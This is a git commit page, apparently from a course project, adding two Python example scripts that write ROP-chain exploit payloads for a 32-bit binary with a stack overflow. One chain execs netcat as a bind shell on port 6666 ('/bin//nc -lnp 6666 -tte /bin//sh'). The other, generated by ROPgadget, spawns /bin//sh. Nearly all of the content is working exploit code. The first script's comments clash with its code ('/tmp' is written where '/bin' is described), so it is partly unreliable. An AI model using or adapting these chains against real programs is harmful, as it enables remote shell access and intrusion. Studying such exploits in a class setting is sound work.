Add example scripts
Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com> Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
parent
e5c6aa6060
commit
b5ef4f9a27
168
docs/exploit-nc.py
Normal file
168
docs/exploit-nc.py
Normal file
@ -0,0 +1,168 @@
|
||||
"""
|
||||
This is a demo python script that creates a ROP chain to launch nc as:
|
||||
> /bin//nc -lnp 6666 -tte /bin//sh
|
||||
The gadgets in the following code are based on my machine & binary and as a result you will have to adjust the gadget based on your environment.
|
||||
With the latest ROPGadget tool that we used in the class, we get the following ropchain:
|
||||
- Step 1 -- Write-what-where gadgets
|
||||
|
||||
[+] Gadget found: 0x8056d05 mov dword ptr [edx], eax ; ret
|
||||
[+] Gadget found: 0x806ee8b pop edx ; ret
|
||||
[+] Gadget found: 0x80a8bf6 pop eax ; ret
|
||||
[+] Gadget found: 0x80562c0 xor eax, eax ; ret
|
||||
|
||||
- Step 2 -- Init syscall number gadgets
|
||||
|
||||
[+] Gadget found: 0x80562c0 xor eax, eax ; ret
|
||||
[+] Gadget found: 0x807c32a inc eax ; ret
|
||||
|
||||
- Step 3 -- Init syscall arguments gadgets
|
||||
|
||||
[+] Gadget found: 0x80481c9 pop ebx ; ret
|
||||
[+] Gadget found: 0x806eeb2 pop ecx ; pop ebx ; ret
|
||||
[+] Gadget found: 0x806ee8b pop edx ; ret
|
||||
|
||||
- Step 4 -- Syscall gadget
|
||||
|
||||
[+] Gadget found: 0x8049603 int 0x80
|
||||
|
||||
- Step 5 -- Build the ROP chain
|
||||
|
||||
|
||||
|
||||
"""
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#!/usr/bin/env python
|
||||
from struct import pack
|
||||
import os
|
||||
######################################
|
||||
fileName=raw_input("Enter the file name")
|
||||
outfile=open(fileName, "wb")
|
||||
# this is just to create variables of the gadgets that we will be using
|
||||
DATA = 0x080da120
|
||||
EDAX0 = pack("<I", 0x08050a88)
|
||||
STACK = pack("<I", DATA) # @ .data
|
||||
INT80 = pack("<I", 0x08049603) # int 0x80
|
||||
MOVISTACK = pack("<I", 0x08056d05) # mov dword ptr [edx], eax ; ret
|
||||
INCEAX = pack("<I", 0x0807c32a) # inc eax ; ret
|
||||
POPEDX = pack("<I", 0x0806ee8b) # pop edx ; ret
|
||||
POPECXEBX = pack("<I", 0x0806eeb2) # pop ecx ; pop ebx ; ret
|
||||
POPEAX = pack("<I", 0x080a8bf6) # pop eax ; ret
|
||||
XOREAX = pack("<I", 0x080562c0) # xor eax, eax ; ret
|
||||
DUMMY = pack("<I", 0x42424242) # padding
|
||||
|
||||
buff = "\x42" * 32
|
||||
buff += "BBBB"*3
|
||||
|
||||
buff += POPEDX # it's via %ecx we will build our stack.
|
||||
buff += STACK # %ecx contain the stack address.
|
||||
|
||||
buff += POPEAX # Lets put content in an address
|
||||
buff += "/tmp" # put "/usr" in %eax
|
||||
buff += MOVISTACK # put "/bin" in stack address
|
||||
|
||||
buff += POPEDX
|
||||
buff += pack("<I", DATA + 4) # we change our stack for to point after "/bin"
|
||||
|
||||
buff += POPEAX # Applying the same for "/nc"
|
||||
buff += "//nc"
|
||||
buff += MOVISTACK # we place "//nc" after "/bin"
|
||||
|
||||
buff += POPEDX
|
||||
buff += pack("<I", DATA + 9) # we change our stack for to point after "bin//nc"+1
|
||||
|
||||
# we repeated operation for each argument
|
||||
buff += POPEAX
|
||||
buff += "-lnp"
|
||||
buff += MOVISTACK
|
||||
|
||||
buff += POPEDX
|
||||
buff += pack("<I", DATA + 14)
|
||||
|
||||
buff += POPEAX
|
||||
buff += "6666"
|
||||
buff += MOVISTACK
|
||||
|
||||
buff += POPEDX
|
||||
buff += pack("<I", DATA + 19)
|
||||
|
||||
buff += POPEAX
|
||||
buff += "-tte"
|
||||
buff += MOVISTACK
|
||||
|
||||
buff += POPEDX
|
||||
buff += pack("<I", DATA + 24)
|
||||
|
||||
buff += POPEAX
|
||||
buff += "/bin"
|
||||
buff += MOVISTACK
|
||||
|
||||
buff += POPEDX
|
||||
buff += pack("<I", DATA + 28)
|
||||
|
||||
buff += POPEAX
|
||||
buff += "//sh"
|
||||
buff += MOVISTACK
|
||||
|
||||
#
|
||||
# We currently have our list of elements separated by \0
|
||||
# Now we must construct our char ** i.e. array 'argguments' of strings
|
||||
# arguments=[ @"/bin//nc", @"-lnp", @"6666", @"-tte", @"/bin//sh"]
|
||||
#
|
||||
|
||||
buff += POPEDX
|
||||
buff += pack("<I", DATA + 60) # shadow stack address (@ of arguments)
|
||||
|
||||
buff += POPEAX
|
||||
buff += pack("<I", DATA) # @ of "/bin//nc" 0th item of arguments[]
|
||||
buff += MOVISTACK # we place address of "/bin//nc" in our STACK
|
||||
|
||||
buff += POPEDX
|
||||
buff += pack("<I", DATA + 64) # we shift our Stack Pointer + 4 for the second argument
|
||||
|
||||
buff += POPEAX
|
||||
buff += pack("<I", DATA + 0x9) # @ of "-lnp"
|
||||
buff += MOVISTACK # we place address of "-lnp" in our STACK
|
||||
|
||||
buff += POPEDX
|
||||
buff += pack("<I", DATA + 68) # we shift our Stack Pointer + 4 for the 3rd argument
|
||||
|
||||
buff += POPEAX
|
||||
buff += pack("<I", DATA + 0xe) # @ of "6666"
|
||||
buff += MOVISTACK # we palce address of "6666" in our STACK
|
||||
|
||||
buff += POPEDX
|
||||
buff += pack("<I", DATA + 72) # we shift our Stack Pointer + 4 for the 4th argument
|
||||
|
||||
buff += POPEAX
|
||||
buff += pack("<I", DATA + 0x13) # @ of "-tte"
|
||||
buff += MOVISTACK # we place address of "-tte" in our STACK
|
||||
|
||||
buff += POPEDX
|
||||
buff += pack("<I", DATA + 76) # we shift our Stack Pointer + 4 for the 5th argument
|
||||
|
||||
buff += POPEAX
|
||||
buff += pack("<I", DATA + 0x18) # @ of "/bin//sh"
|
||||
buff += MOVISTACK # we place address of "/bin//sh" in our STACK
|
||||
|
||||
#
|
||||
# Now we must implement eax to contain the address of
|
||||
# the execve syscall.
|
||||
# execve = 0xb
|
||||
#
|
||||
|
||||
buff += XOREAX # %eax is put to zero.
|
||||
buff += INCEAX * 11 # %eax is now 0xb
|
||||
buff += POPEDX # last pop
|
||||
buff += pack("<I", DATA + 48) # edx char *env
|
||||
buff += POPECXEBX # last pop
|
||||
buff += pack("<I", DATA + 60) # ecx char **arguments
|
||||
buff += pack("<I", DATA) # ebx "/usr/bin//nc"
|
||||
buff += INT80 # we execute
|
||||
outfile.write(buff)
|
||||
outfile.close()
|
||||
|
||||
#print buff
|
80
docs/script_reference.py
Normal file
80
docs/script_reference.py
Normal file
@ -0,0 +1,80 @@
|
||||
|
||||
# ROP chain generation
|
||||
# ===========================================================
|
||||
|
||||
# - Step 1 -- Write-what-where gadgets
|
||||
|
||||
# [+] Gadget found: 0x8056cf5 mov dword ptr [edx], eax ; ret
|
||||
# [+] Gadget found: 0x806e23b pop edx ; ret
|
||||
# [+] Gadget found: 0x80a89e6 pop eax ; ret
|
||||
# [+] Gadget found: 0x80562b0 xor eax, eax ; ret
|
||||
|
||||
# - Step 2 -- Init syscall number gadgets
|
||||
|
||||
# [+] Gadget found: 0x80562b0 xor eax, eax ; ret
|
||||
# [+] Gadget found: 0x807b6da inc eax ; ret
|
||||
|
||||
# - Step 3 -- Init syscall arguments gadgets
|
||||
|
||||
# [+] Gadget found: 0x80481c9 pop ebx ; ret
|
||||
# [+] Gadget found: 0x806e262 pop ecx ; pop ebx ; ret
|
||||
# [+] Gadget found: 0x806e23b pop edx ; ret
|
||||
|
||||
# - Step 4 -- Syscall gadget
|
||||
|
||||
# [+] Gadget found: 0x80495f3 int 0x80
|
||||
|
||||
# - Step 5 -- Build the ROP chain
|
||||
|
||||
#!/usr/bin/env python2
|
||||
# execve generated by ROPgadget
|
||||
|
||||
from struct import pack
|
||||
|
||||
import sys
|
||||
|
||||
out_file = sys.argv[1]
|
||||
|
||||
p = b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
|
||||
|
||||
p += pack('<I', 0x0806e23b) # pop edx ; ret
|
||||
p += pack('<I', 0x080d9060) # @ .data
|
||||
p += pack('<I', 0x080a89e6) # pop eax ; ret
|
||||
p += b'/bin'
|
||||
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
|
||||
p += pack('<I', 0x0806e23b) # pop edx ; ret
|
||||
p += pack('<I', 0x080d9064) # @ .data + 4
|
||||
p += pack('<I', 0x080a89e6) # pop eax ; ret
|
||||
p += b'//sh'
|
||||
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
|
||||
p += pack('<I', 0x0806e23b) # pop edx ; ret
|
||||
p += pack('<I', 0x080d9068) # @ .data + 8
|
||||
p += pack('<I', 0x080562b0) # xor eax, eax ; ret
|
||||
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
|
||||
p += pack('<I', 0x080481c9) # pop ebx ; ret
|
||||
p += pack('<I', 0x080d9060) # @ .data
|
||||
p += pack('<I', 0x0806e262) # pop ecx ; pop ebx ; ret
|
||||
p += pack('<I', 0x080d9068) # @ .data + 8
|
||||
p += pack('<I', 0x080d9060) # padding without overwrite ebx
|
||||
|
||||
p += pack('<I', 0x0806e23b) # pop edx ; ret
|
||||
p += pack('<I', 0x080d9068) # @ .data + 8
|
||||
p += pack('<I', 0x080562b0) # xor eax, eax ; ret
|
||||
|
||||
p += pack('<I', 0x0807b6da) # inc eax ; ret
|
||||
p += pack('<I', 0x0807b6da) # inc eax ; ret
|
||||
p += pack('<I', 0x0807b6da) # inc eax ; ret
|
||||
p += pack('<I', 0x0807b6da) # inc eax ; ret
|
||||
p += pack('<I', 0x0807b6da) # inc eax ; ret
|
||||
p += pack('<I', 0x0807b6da) # inc eax ; ret
|
||||
p += pack('<I', 0x0807b6da) # inc eax ; ret
|
||||
p += pack('<I', 0x0807b6da) # inc eax ; ret
|
||||
p += pack('<I', 0x0807b6da) # inc eax ; ret
|
||||
p += pack('<I', 0x0807b6da) # inc eax ; ret
|
||||
p += pack('<I', 0x0807b6da) # inc eax ; ret
|
||||
p += pack('<I', 0x080495f3) # int 0x80
|
||||
|
||||
|
||||
with open(out_file, "wb") as f:
|
||||
f.write(p)
|
||||
|
Loading…
Reference in New Issue
Block a user